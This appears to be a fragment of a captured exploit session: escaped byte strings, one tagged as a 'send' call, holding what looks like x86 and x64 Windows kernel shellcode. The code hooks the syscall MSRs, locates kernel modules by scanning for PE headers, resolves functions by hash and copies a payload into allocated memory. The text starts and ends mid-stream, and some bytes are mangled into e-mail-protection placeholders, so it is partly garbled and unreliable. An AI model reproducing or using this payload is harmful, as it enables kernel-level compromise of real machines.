\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xeb\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\[email\u00a0protected]\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\[email\u00a0protected]\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\[email\u00a0protected]\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\[email\u00a0protected]<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\[email\u00a0protected]\\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\[email\u00a0protected]\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 9, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\[email\u00a0protected]\\\\x90t\\\\x08\\\\xe8\\\\t\\\\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea \\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\[email\u00a0protected]\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\[email\u00a0protected]\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4